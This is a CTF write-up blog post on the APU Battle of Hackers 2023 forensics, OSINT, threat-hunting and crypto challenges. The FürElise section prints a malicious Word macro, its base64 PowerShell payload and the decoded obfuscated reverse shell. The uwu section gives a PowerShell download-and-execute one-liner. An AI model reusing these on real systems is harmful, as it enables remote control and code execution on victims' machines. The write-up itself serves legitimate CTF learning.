Post

APU Battle of Hackers CTF 2023 - Writeups

Posted Updated
By warlocksmurf 13 min read

This was the first CTF that I’ve participated in with new teammates @Wowiee and his friend @Damien. Sadly @Damien had covid so he could not attend the CTF physically, however, he still tried his best to solve certain challenges despite being sick. In the end we managed to achieve 13th place out of 107 teams.

Crack Store [Forensics]

Flag: ABOH23{n0t_That_KINd_oF_CR4Ck_S70RE}

We are given a zip file to presumably crack. Unfortunately I could not solve this during the competition but I attempted it at home. The challenge author @Zach told us the challenge was similar to a John Hammond video on brute forcing zip files. Analyzing the zip file, we find out that the zip is encrypted with ZipCrypto Store method which is vulnerable to the plaintext attack.

bkcrack1

According to John Hammond, we can use the bkcrack tool to crack open these zip files. Since the host file will always have # Copyright (c) 1993-2009 Microsoft Corp. at the beginning of the file, we can create our own text file using this phrase to attempt plaintext attack.

bkcrack2

bkcrack3

FürElise [Forensics]

Flag: ABOH23{d!ff1cU17_s0Ng_FROm_hEaRtBrE4K}

We are given a file without any extension called heartbroken. Checking its contents, an obfuscated function can be found. Noticing a URL can be formed by removing the repetitive ampersands (&), we can obtain two URLs after deobfuscating them.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

Sub Document_Open()
    Set dCBkaW1pbm = CreateObject("WScript.Shell")
    pbmcgYXQgY3Jvc = "&h&t&t&p&s&:&/&/&"
    CBtYXR0ZXJucy = "&p&a&s&t&e&b&i&n&.&c&o&m&"
    4gb3ZlciB3ZSB = "&/&r&a&w&/&K&h&4&V&y&U&Y&c&"
    Replace(luY2lkZW50IG, "&", "")
    Replace(luZyB0aGF0IG, "&", "")
    Replace(VsZCBkZWNvZG, "&", "")
    Replace(N0b3JzLCBjb3, "&", "")
    Replace(BkZWZpbmVkIH, "&", "")
    Replace(4gY29tcGxleC, "&", "")
    Replace(pbmcgYXQgY3Jvc, "&", "")
    Replace(CBtYXR0ZXJucy, "&", "")
    Replace(4gb3ZlciB3ZSB, "&", "")
    dCBkaW1pbm.Exec("whoami")
    luY2lkZW50IG = "h&t&t&p&s&:/&/g&i&s&t&.&g&i&t&h&u&b&u&s&e&r&c&o&n&t&e&n&t&.&c&o&m&/z&a&c&h&w&o&n&g&0&2"
    luZyB0aGF0IG = "/5&a&8&e&7&d&3&6&5&c&6&d&9&b&6&4&9&b&1&2&b&e&3&c&8&9&0&c&8&c&b&4"
    VsZCBkZWNvZG = "/raw"
    N0b3JzLCBjb3 = "/85f79114e8cb93dca7d1ae44d5fdd81aa95d021e9"
    BkZWZpbmVkIH = "/gistfile1"
    4gY29tcGxleC = ".txt"
End Sub

fur1

One part of the flag can be obtained with the first URL https://pastebin.com/raw/Kh4VyUYc. However, the second URL decoded was a URL to a GitHub stored text file. Within the text file was a string encoded with Powershell, so this is probably a powershell script.

fur2

1

powershell.exe -exec bypass -enc aQBmACAAKAAtAG4AbwB0ACgAJgAoACQAKABbAGMAaABhAHIAXQAoADkAOQArADgANAAtADkAOQApACsAWwBjAGgAYQByAF0AKAA2ADcAKgAxADAAMQAvADYANwApACsAWwBjAGgAYQByAF0AKAAwACsAMQAxADUALQAwACkAKwBbAGMAaABhAHIAXQAoADAAKwAxADEANgAtADAAKQArAFsAYwBoAGEAcgBdACgAMQA2ACsANAA1AC0AMQA2ACkAKwBbAGMAaABhAHIAXQAoADEAMQA0ACsAOAAwAC0AMQAxADQAKQArAFsAYwBoAGEAcgBdACgAOQA2ACoAOQA3AC8AOQA2ACkAKwBbAGMAaABhAHIAXQAoADAAKwAxADEANgAtADAAKQArAFsAYwBoAGEAcgBdACgAMAArADEAMAA0AC0AMAApACkAKQAgAC0AUABhAHQAaAAgACgAJAAoACcAJAAnACsAJwBlACcAKwAnAG4AJwArACcAdgAnACsAJwA6ACcAKwAnAFUAJwArACcAUwAnACsAJwBFACcAKwAnAFIAJwArACcAUAAnACsAJwBSACcAKwAnAE8AJwArACcARgAnACsAJwBJACcAKwAnAEwAJwArACcARQAnACkAIAArACAAKABbAHMAdAByAGkAbgBnAF0AOgA6AGoAbwBpAG4AKAAnACcALAAgACgAIAAoADkAMgAsADYAOAAsADEAMAAxACwAMQAxADUALAAxADAANwAsADEAMQA2ACwAMQAxADEALAAxADEAMgAsADkAMgAsADcANwAsADEAMQA3ACwAMQAxADUALAAxADAANQAsADkAOQApACAAfAAlAHsAIAAoACAAWwBjAGgAYQByAF0AWwBpAG4AdABdACAAJABfACkAfQApACkAIAB8ACAAJQAgAHsAJABfAH0AKQApACAALQBQAGEAdABoAFQAeQBwAGUAIAAoACgAWwBzAHQAcgBpAG4AZwBdADoAOgBqAG8AaQBuACgAJwAnACwAIAAoACAAKAA3ADYALAAxADAAMQAsADkANwAsADEAMAAyACkAIAB8ACUAewAgACgAIABbAGMAaABhAHIAXQBbAGkAbgB0AF0AIAAkAF8AKQB9ACkAKQAgAHwAIAAlACAAewAkAF8AfQApACkAKQApAHsACgAJACYAIAAoACgAIgBqAEQAawBhAHYAWABmAC0AcAA5ADgATwBZAFMAaAB0AE0AZwA0AEEAMgBjAE4ANQB4AFAASQBIAGUARgAxAHoAeQBFAGwAVABuAHcAWgBtAFIAYgBMAEsAUQBHAGkAcwBKAEMAMABVAFcAbwBCAFYAZAB1AHEAcgA2ADMANwAiACkAWwAzADcALAA1ADkALAA0ADYALAAxADUALAAyADgALAA3ACwAMQA0ACwANQAzACwANAA3ACwAMQA1AF0AIAAtAGoAbwBpAG4AIAAnACcAKQAgACgAKAAnAGQAJwArACcAbwAnACsAJwBuACcAKwAnAHQAJwArACcAIAAnACsAJwBlACcAKwAnAHgAJwArACcAZQAnACsAJwBjACcAKwAnAHUAJwArACcAdAAnACsAJwBlACcAKwAnACAAJwArACcAdAAnACsAJwBoACcAKwAnAGUAJwArACcAIAAnACsAJwBzACcAKwAnAGMAJwArACcAcgAnACsAJwBpACcAKwAnAHAAJwArACcAdAAnACsAJwAuACcAKwAnAC4AJwArACcALgAnACsAJwAgACcAKwAnAGEAJwArACcAbQAnACsAJwBhACcAKwAnAHQAJwArACcAZQAnACsAJwB1ACcAKwAnAHIAJwArACcAIAAnACsAJwBtACcAKwAnAG8AJwArACcAbQAnACsAJwBlACcAKwAnAG4AJwArACcAdAAnACsAJwAuACcAKwAnAC4AJwArACcALgAnACkAKQAKAAkAcgBlAHQAdQByAG4ACgB9AAoAJABMAEgATwBTAFQAIAA9ACAAJAAoAFsAYwBoAGEAcgBdACgAMwA2ACoAMwA2AC8AMwA2ACkAKwBbAGMAaABhAHIAXQAoADcANgArADQAMAAtADcANgApACsAWwBjAGgAYQByAF0AKAAwACsANAA5AC0AMAApACsAWwBjAGgAYQByAF0AKAAyADcAKgA0ADMALwAyADcAKQArAFsAYwBoAGEAcgBdACgAMAArADQAOQAtADAAKQArAFsAYwBoAGEAcgBdACgAMgA3ACoANAAzAC8AMgA3ACkAKwBbAGMAaABhAHIAXQAoADgANgArADQAOAAtADgANgApACsAWwBjAGgAYQByAF0AKAAwACsANAA1AC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANAA5AC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANAAxAC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsAOQA5AC0AMAApACsAWwBjAGgAYQByAF0AKAA5ADgAKwA5ADcALQA5ADgAKQArAFsAYwBoAGEAcgBdACgANQAyACsAMQAxADYALQA1ADIAKQArAFsAYwBoAGEAcgBdACgANwAqADEAMAAxAC8ANwApACsAWwBjAGgAYQByAF0AKAAwACsANgAyAC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANQA3AC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANQAwAC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANAA2AC0AMAApACsAWwBjAGgAYQByAF0AKAA0ADMAKgA0ADkALwA0ADMAKQArAFsAYwBoAGEAcgBdACgAMAArADUANAAtADAAKQArAFsAYwBoAGEAcgBdACgAMQAxADYAKwA1ADYALQAxADEANgApACsAWwBjAGgAYQByAF0AKAAzADcAKgA0ADYALwAzADcAKQArAFsAYwBoAGEAcgBdACgAOAA2ACoANQAwAC8AOAA2ACkAKwBbAGMAaABhAHIAXQAoADkANAAqADUAMAAvADkANAApACsAWwBjAGgAYQByAF0AKAAwACsANAA5AC0AMAApACsAWwBjAGgAYQByAF0AKAA3ADYAKwA0ADYALQA3ADYAKQArAFsAYwBoAGEAcgBdACgAMAArADQAOQAtADAAKQArAFsAYwBoAGEAcgBdACgANwA0ACsANQAyAC0ANwA0ACkAKwBbAGMAaABhAHIAXQAoADkANgAqADUANgAvADkANgApACkAOwAKACQATABQAE8AUgBUACAAPQAgACgAJAAoADQANAA0ADQAKQApADsACgAkAFQAQwBQAEMAbABpAGUAbgB0ACAAPQAgACYAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoAagBvAGkAbgAoACcAJwAsACAAKAAgACgANwA4ACwAMQAwADEALAAxADEAOQAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApACAAfAAlAHsAIAAoACAAWwBjAGgAYQByAF0AWwBpAG4AdABdACAAJABfACkAfQApACkAIAB8ACAAJQAgAHsAJABfAH0AKQAgAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJABMAEgATwBTAFQALAAgACQATABQAE8AUgBUACkAOwAKACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQAgAD0AIAAkAFQAQwBQAEMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsACgAkAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACAAPQAgACYAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoAagBvAGkAbgAoACcAJwAsACAAKAAgACgANwA4ACwAMQAwADEALAAxADEAOQAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApACAAfAAlAHsAIAAoACAAWwBjAGgAYQByAF0AWwBpAG4AdABdACAAJABfACkAfQApACkAIAB8ACAAJQAgAHsAJABfAH0AKQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAJABOAGUAdAB3AG8AcgBrAFMAdAByAGUAYQBtACkAOwAKACQAUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAIAA9ACAAJgAgACgAWwBzAHQAcgBpAG4AZwBdADoAOgBqAG8AaQBuACgAJwAnACwAIAAoACAAKAA3ADgALAAxADAAMQAsADEAMQA5ACwANAA1ACwANwA5ACwAOQA4ACwAMQAwADYALAAxADAAMQAsADkAOQAsADEAMQA2ACkAIAB8ACUAewAgACgAIABbAGMAaABhAHIAXQBbAGkAbgB0AF0AIAAkAF8AKQB9ACkAKQAgAHwAIAAlACAAewAkAF8AfQApACAASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAE4AZQB0AHcAbwByAGsAUwB0AHIAZQBhAG0AKQA7AAoAJABTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAuAEEAdQB0AG8ARgBsAHUAcwBoACAAPQAgACQAdAByAHUAZQA7AAoAJABCAHUAZgBmAGUAcgAgAD0AIAAmACAAKABbAHMAdAByAGkAbgBnAF0AOgA6AGoAbwBpAG4AKAAnACcALAAgACgAIAAoADcAOAAsADEAMAAxACwAMQAxADkALAA0ADUALAA3ADkALAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAMQAxADYAKQAgAHwAJQB7ACAAKAAgAFsAYwBoAGEAcgBdAFsAaQBuAHQAXQAgACQAXwApAH0AKQApACAAfAAgACUAIAB7ACQAXwB9ACkAIABTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdACAAJAAoACQAKAAxADAAMgA0ACkAKQA7AAoAdwBoAGkAbABlACAAKAAkAFQAQwBQAEMAbABpAGUAbgB0AC4AQwBvAG4AbgBlAGMAdABlAGQAKQAgAHsAIAB3AGgAaQBsAGUAIAAoACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQAuAEQAYQB0AGEAQQB2AGEAaQBsAGEAYgBsAGUAKQAgAHsAIAAkAFIAYQB3AEQAYQB0AGEAIAA9ACAAJABOAGUAdAB3AG8AcgBrAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAQgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAkAGMAMgAgAD0AIAAkACgAWwBjAGgAYQByAF0AKAAyADcAKgAxADAANAAvADIANwApACsAWwBjAGgAYQByAF0AKAA2ADAAKwAxADEANgAtADYAMAApACsAWwBjAGgAYQByAF0AKAA1ADcAKgAxADEANgAvADUANwApACsAWwBjAGgAYQByAF0AKAA2ADcAKgAxADEAMgAvADYANwApACsAWwBjAGgAYQByAF0AKAAxADgAKwAxADEANQAtADEAOAApACsAWwBjAGgAYQByAF0AKAAyADgAKwA1ADgALQAyADgAKQArAFsAYwBoAGEAcgBdACgANwA2ACoANAA3AC8ANwA2ACkAKwBbAGMAaABhAHIAXQAoADUAMAAqADQANwAvADUAMAApACsAWwBjAGgAYQByAF0AKAA4ADMAKgAxADEAMgAvADgAMwApACsAWwBjAGgAYQByAF0AKAA4ADkAKgA5ADcALwA4ADkAKQArAFsAYwBoAGEAcgBdACgAMAArADEAMQA1AC0AMAApACsAWwBjAGgAYQByAF0AKAAyADMAKgAxADEANgAvADIAMwApACsAWwBjAGgAYQByAF0AKAA3ACoAMQAwADEALwA3ACkAKwBbAGMAaABhAHIAXQAoADcAOAArADkAOAAtADcAOAApACsAWwBjAGgAYQByAF0AKAA3ADYAKgAxADAANQAvADcANgApACsAWwBjAGgAYQByAF0AKAA4ADYAKwAxADEAMAAtADgANgApACsAWwBjAGgAYQByAF0AKAAwACsANAA2AC0AMAApACsAWwBjAGgAYQByAF0AKAA4ADYAKgA5ADkALwA4ADYAKQArAFsAYwBoAGEAcgBdACgANQAyACoAMQAxADEALwA1ADIAKQArAFsAYwBoAGEAcgBdACgAMQAwADAAKwAxADAAOQAtADEAMAAwACkAKwBbAGMAaABhAHIAXQAoADEAMAAqADQANwAvADEAMAApACsAWwBjAGgAYQByAF0AKAAwACsAMQAxADQALQAwACkAKwBbAGMAaABhAHIAXQAoADkANAArADkANwAtADkANAApACsAWwBjAGgAYQByAF0AKAA5ADUAKwAxADEAOQAtADkANQApACsAWwBjAGgAYQByAF0AKAAyADUAKgA0ADcALwAyADUAKQArAFsAYwBoAGEAcgBdACgAMAArADcANAAtADAAKQArAFsAYwBoAGEAcgBdACgANQA5ACoANgA3AC8ANQA5ACkAKwBbAGMAaABhAHIAXQAoADMAMQArADEAMAAzAC0AMwAxACkAKwBbAGMAaABhAHIAXQAoADAAKwA3ADYALQAwACkAKwBbAGMAaABhAHIAXQAoADUANgArADEAMgAyAC0ANQA2ACkAKwBbAGMAaABhAHIAXQAoADUANwArADUAMgAtADUANwApACsAWwBjAGgAYQByAF0AKAAwACsAMQAwADIALQAwACkAKwBbAGMAaABhAHIAXQAoADQAMAAqADQAOQAvADQAMAApACkAOwAKACQAQwBvAGQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUgBhAHcARABhAHQAYQAgAC0AMQApACAAfQA7AAoAaQBmACAAKAAkAFQAQwBQAEMAbABpAGUAbgB0AC4AQwBvAG4AbgBlAGMAdABlAGQAIAAtAGEAbgBkACAAJABDAG8AZABlAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADEAKQAgAHsAIAAkAE8AdQB0AHAAdQB0ACAAPQAgAHQAcgB5ACAAewAgACYAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoAagBvAGkAbgAoACcAJwAsACAAKAAgACgANwAzACwAMQAxADAALAAxADEAOAAsADEAMQAxACwAMQAwADcALAAxADAAMQAsADQANQAsADYAOQAsADEAMgAwACwAMQAxADIALAAxADEANAAsADEAMAAxACwAMQAxADUALAAxADEANQAsADEAMAA1ACwAMQAxADEALAAxADEAMAApACAAfAAlAHsAIAAoACAAWwBjAGgAYQByAF0AWwBpAG4AdABdACAAJABfACkAfQApACkAIAB8ACAAJQAgAHsAJABfAH0AKQAgACgAJABDAG8AZABlACkAIAAyAD4AJgAxACAAfQAgAGMAYQB0AGMAaAAgAHsAIAAkAF8AIAB9ADsACgAkAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByAC4AVwByAGkAdABlACgAJAAoACgAJAAoACcAJAAnACsAJwBPACcAKwAnAHUAJwArACcAdAAnACsAJwBwACcAKwAnAHUAJwArACcAdAAnACsAJwBgACcAKwAnAG4AJwApACkAKQApADsACgAkAEMAbwBkAGUAIAA9ACAAJABuAHUAbABsACAAfQAgAH0AOwAKACQAVABDAFAAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsACgAkAE4AZQB0AHcAbwByAGsAUwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsACgAkAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByAC4AQwBsAG8AcwBlACgAKQA7AAoAJABTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAuAEMAbABvAHMAZQAoACkAOwAKAAoA

fur3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

if (-not(&($([char](99+84-99)+[char](67*101/67)+[char](0+115-0)+[char](0+116-0)+[char](16+45-16)+[char](114+80-114)+[char](96*97/96)+[char](0+116-0)+[char](0+104-0))) -Path ($('$'+'e'+'n'+'v'+':'+'U'+'S'+'E'+'R'+'P'+'R'+'O'+'F'+'I'+'L'+'E') + ([string]::join('', ( (92,68,101,115,107,116,111,112,92,77,117,115,105,99) |%{ ( [char][int] $_)})) | % {$_})) -PathType (([string]::join('', ( (76,101,97,102) |%{ ( [char][int] $_)})) | % {$_})))){
	& (("jDkavXf-p98OYShtMg4A2cN5xPIHeF1zyElTnwZmRbLKQGisJC0UWoBVduqr637")[37,59,46,15,28,7,14,53,47,15] -join '') (('d'+'o'+'n'+'t'+' '+'e'+'x'+'e'+'c'+'u'+'t'+'e'+' '+'t'+'h'+'e'+' '+'s'+'c'+'r'+'i'+'p'+'t'+'.'+'.'+'.'+' '+'a'+'m'+'a'+'t'+'e'+'u'+'r'+' '+'m'+'o'+'m'+'e'+'n'+'t'+'.'+'.'+'.'))
	return
}
$LHOST = $([char](36*36/36)+[char](76+40-76)+[char](0+49-0)+[char](27*43/27)+[char](0+49-0)+[char](27*43/27)+[char](86+48-86)+[char](0+45-0)+[char](0+49-0)+[char](0+41-0)+[char](0+99-0)+[char](98+97-98)+[char](52+116-52)+[char](7*101/7)+[char](0+62-0)+[char](0+57-0)+[char](0+50-0)+[char](0+46-0)+[char](43*49/43)+[char](0+54-0)+[char](116+56-116)+[char](37*46/37)+[char](86*50/86)+[char](94*50/94)+[char](0+49-0)+[char](76+46-76)+[char](0+49-0)+[char](74+52-74)+[char](96*56/96));
$LPORT = ($(4444));
$TCPClient = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Net.Sockets.TCPClient($LHOST, $LPORT);
$NetworkStream = $TCPClient.GetStream();
$StreamReader = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) IO.StreamReader($NetworkStream);
$StreamWriter = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) IO.StreamWriter($NetworkStream);
$StreamWriter.AutoFlush = $true;
$Buffer = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) System.Byte[] $($(1024));
while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length);
$c2 = $([char](27*104/27)+[char](60+116-60)+[char](57*116/57)+[char](67*112/67)+[char](18+115-18)+[char](28+58-28)+[char](76*47/76)+[char](50*47/50)+[char](83*112/83)+[char](89*97/89)+[char](0+115-0)+[char](23*116/23)+[char](7*101/7)+[char](78+98-78)+[char](76*105/76)+[char](86+110-86)+[char](0+46-0)+[char](86*99/86)+[char](52*111/52)+[char](100+109-100)+[char](10*47/10)+[char](0+114-0)+[char](94+97-94)+[char](95+119-95)+[char](25*47/25)+[char](0+74-0)+[char](59*67/59)+[char](31+103-31)+[char](0+76-0)+[char](56+122-56)+[char](57+52-57)+[char](0+102-0)+[char](40*49/40));
$Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) };
if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { & ([string]::join('', ( (73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110) |%{ ( [char][int] $_)})) | % {$_}) ($Code) 2>&1 } catch { $_ };
$StreamWriter.Write($(($('$'+'O'+'u'+'t'+'p'+'u'+'t'+'`'+'n'))));
$Code = $null } };
$TCPClient.Close();
$NetworkStream.Close();
$StreamReader.Close();
$StreamWriter.Close();

Analyzing the decoded script, we can find a suspcious variable called $c2 which indicates a C2 server. Running the variable on Powershell, the second part of the flag can be obtained with the second URL https://pastebin.com/raw/JCgLz4f1.

fur4

With the two URLs, the flag can be obtained.

fur5

uwu [Forensics]

Flag: ABOH23{pER5!St3NCE_!5_my_ninj@_waY}

We are given a E01 file to investigate. Using Autopsy, an image of a Windows machine can be analyzed. Going through common directories, a credentials.txt file was found in the user’s Desktop and it shows the username and passwords of several users.

uwu1

Checking out the Downloads folder, several files with base64 encoded filenames, a password-locked zip file and a suspicious exe file called kotoamatsukami.exe can be found.

uwu2

Remembering about the credential file obtained previously, I used naruto’s password dattebayo on it and it worked. Inside the zip file was a bunch of videos and after spending 2-3 hours analyzing them, they were useless.

uwu3

Back into a loophole, I analyzed kotoamatsukami.exe by running it on my machine. Running it caused my Desktop wallpaper to change into a sharingan (Damn you Shisui!!). At this point I could not solve it before the CTF ended but I attempted it at home after reading a writeup from @OctaneSan.

uwu4

Using Procmon, I can check what it actually does in my system other than changing the wallpaper. Additionally, from the file thumbnail, kotoamatsukami.exe seems to be a Python executable. Analyzing the processes, a malicious operation that links with the registry key and shell was found.

uwu5

Jumping to the process, we can see a powershell command being invoked.

uwu6

uwu7

1

powershell -exec bypass -c 'Invoke-WebRequest https://gist.githubusercontent.com/zachwong02/9f9054bc9db15aeb453dc37e59878aac/raw/48f39f9328189ae8260c6e040eb6d3b57403135e/gistfile1.txt | iex'

Running the powershell script, it leads to an obfuscated text file which seems to be reading the metadata of the genjutsu.jpg image located in the Downloads folder. The script extracts each character of the Title metadata to craft a string. So running the command after importing the module and placing the image file in the Downloads folder, the flag can be obtained.

1
2

$chars = Get-FileMetaData $env:USERPROFILE\Downloads\genjutsu.jpg | Select-Object -ExpandProperty "Title"
$chars[0] + $chars[1] + $chars[14] + $chars[7] + $chars[54] + $chars[55] + $chars[65] + $chars[41] + $chars[4] + $chars[17] + $chars[57] + $chars[62] +$chars[18] + $chars[45] + $chars[55] + $chars[13] + $chars[2] + $chars[4] +  $chars[63] +  $chars[62] + $chars[57] + $chars[63] + $chars[38] +  $chars[50] + $chars[63] + $chars[39] +  $chars[34] + $chars[39] + $chars[35] + $chars[64] + $chars[63] + $chars[48] + $chars[26] + $chars[24] + $chars[66]

uwu8

SCP 2.0 [Forensics]

Flag: ABOH23{C0NT41nm3Nt_Breach_8Y_M@cr0$}

We are given a memory dump and a pdf file about a SCP specimen to investigate. Unfortunately I could not solve this during the competition but I attempted it at home. Thanks @Encient for her writeup! Reading the pdf file given, it says that employees are required to backup data including documentation, images, videos, etc.

scp1

Analyzing the processes and files with SCP as the keyword, a suspicious document file can be obtained.

scp2

Dumping the document file, I read its contents and found the flag file located in the user’s Desktop. However, it seems that the file was missing in the memory dump since it could not be obtained via filescan.

scp3

Referring back to the pdf file, it also mentions that employees must “eradicate” or in another words delete the data. So it seeems the flag was probably deleted and hence I should find it in another way.

scp4

This is where @Encient was smart about it, we can actually extract the MFT of the machine using a plugin from Volatility2 called mftparser. After parsing the MFT data, we can either grep .txt or $Recycle to locate the flag file since it was probably located in the Recycle bin. The flag file was named $RD0BID3.txt after deletion.

scp5

Finding the flag file, its data can be decoded to obtain the flag.

scp6

Hippity Hoppity Your Culture [OSINT]

Flag: ABOH23{Oc.1716}

We are tasked to find the registration number of a specific flute. Google it.

flute1

Who’s That Pokémon? [OSINT]

Flag: ABOH23{Charizard_VSTAR,Narrow_Miscut,9}

We are tasked to find a specific Pokemon card with its card name, error type and original grade. A CGC cert number 4302093025 was provided to start our search, so I used the official CGC card verifier to identify the card.

pokemon1

Verifying the card, we can identify the name and number of the card, but it seems that the error type and grade is not present for some reason. So I tried to just Google the cert number and found a video on a Charizard VSTAR card error.

pokemon2

Zooming into the card, the cert number proves that this is the card we are looking for, and hence the flag too.

pokemon3 spy-kids-lemme-zoom-in-on-that

We All Have That 1 K-Everything [OSINT]

Flag: ABOH23{631fee75fca0c0b9536339f34e71304c}

We are tasked to find a specific location shown in these two videos Kpop MV and the LCK trailer. Watching the videos carefully, it seems that the location shown in both videos is a container yard.

kpop1

kpop2

So I tried reverse searching the LCK image and got the exact location in this website.

kpop3

kpop4

Search the address on Google Maps to get the right location and hash it in MD5 to get the flag.

kpop5

Sky Full of Cables [OSINT]

Flag: ABOH23{Krung_Thonburi_Charoen_Nakhon}

We are tasked to find the two specific stations between the person in the picture. Reverse searching the picture, it seems that this place could potentially be in Thailand, specifically Bangkok.

train1

train2

Sadly I could not solve this before the CTF ended, so I attempted it at home. I narrowed my search by going through different parts of the picture. After several minutes of searching, I found this Youtube video that could help in finding the specific location.

train3

It looks like the location could be in Golden Line, so I continued looking for clues in the picture and found a barber at the bottom of the picture.

train4

Googling the barber store’s name 54 Barber, the location was indeed Golden Line.

train5

We can even see the tall bulky building indicated at the right corner of the picture.

train6

Now we just have to find the two stations between this line. We can see it starts at Krung Thonburi (Golden Line) and stops at Charoen Nakhon. So the flag is these two stations.

train7

A Shark Bit My Report [OSINT]

Flag: ABOH23{Ironbound_Island_Nova_Scotia}

We are tasked to the find the last ping location of a shark that bit the author’s report in her blog. Inside the author’s blog, nothing can be found. However, since the challenge said that the shark bit her report (past tense), the report can be recovered using WayBackMachine to essentially “go back in time”.

shark1

Looking through the report, it was filled with random text and irrelevent clues for finding the flag. However, there is a statement that could prove beneficial. They mentioned that the shark was a Male, so we could use that information to filter something else later on.

shark2

We also found a supposedly barcode at the bottom of the page, but after several minutes on decoding it, it was completely irrelevent. Sadly I could not solve this before the CTF ended, so I attempted it at home.

shark3

Later on, I found a website that pings ocean sharks. Since we know its a Male shark, we can filter it and narrow our search. However, the author updated the flag saying that we should change the filters to specify Tracking Activity to show the most recent only. Apparently the shark’s ping suddenly went alive the moment the CTF started (what a coincidence). With this update, many people finally knew which shark to take and the answer can be found by looking at the most recent shark ping was Bob.

shark4

shark5

Ransomware 1 [Threat Hunting]

Flag: ABOH23{Mcqqic24UJyU40JKdja0A.exe}

We are given a compromised Windows machine that was recently attacked by a ransomware to investigate. The first question was to find the filename of the ransomware somewhere inside the machine. My method was to just manually analyze common folders like Desktop, Downloads, Temp, etc. Going through all of them, I found two suspicious programs in the System32 folder. The ransomware was Mcqqic24UJyU40JKdja0A.exe.

th1

However, after the CTF ended, I felt like the best way to find suspicious executables (accordng to SANS) was by using either Amcache, Shimcache or even Prefetch files. So by using AmcacheParser from EZTools, we can extract the Amcache located in C:\Windows\appcompat\Programs\Amcache.hve and parse it to be analyze further using Timeline Explorer. Going through Timeline Explorer, we can find two suspicious executables in System32.

th2

Ransomware 2 [Threat Hunting]

Flag: ABOH23{2e1594cea1d8e012c709f3d71a4e57dcbc9d017b89f623822fc56c9f734eb491}

The second question was to identify the SHA256 hash value of the executable responsible for exfiltrating data. We know there is another suspcious program located in the same folder with the ransomware. So I analyzed the other malicious executable ifPUXc85P8DnPFx7wYHbYw.exe using VirusTotal and found out it was a filestealer program.

th3

Ransomware 3 [Threat Hunting]

Flag: ABOH23{http://146.190.89.115:8080/YPAPJDoGD3aIQlFix11ZA.php}

The third question was to identify the external connection created by ifPUXc85P8DnPFx7wYHbYw.exe. Using Virustotal again, we can see the network communications were made to 146.190.89.115:8080.

th4

May The Force Be With You [Cryptography]

Flag: ABOH23{A3S_Rul35_tH3_F0rc3}

We were given an encryption script and the encoded text.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Random import get_random_bytes
from Crypto.Protocol.KDF import PBKDF2

import textwrap

def encrypt_file(file_path, password):
    with open(file_path, 'rb') as file:
        plaintext = file.read()


    iv = get_random_bytes(AES.block_size)

    passwd = textwrap.dedent(password)[:-1]


    salt = b'salt123'  
    key = PBKDF2(passwd.encode(), salt, dkLen=16)


    cipher = AES.new(key, AES.MODE_CBC, iv)


    ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))


    encrypted_file_path = file_path + '.enc'
    with open(encrypted_file_path, 'wb') as file:
        file.write(ciphertext + iv)

    print("Encryption successful. Encrypted file saved as:", encrypted_file_path)


password = "ni5h2h?Yrq8Do?n+|6a;pKbZkv%}O~tV" 
file_path = "./flag.txt"   
encrypt_file(file_path, password)

1
2
3

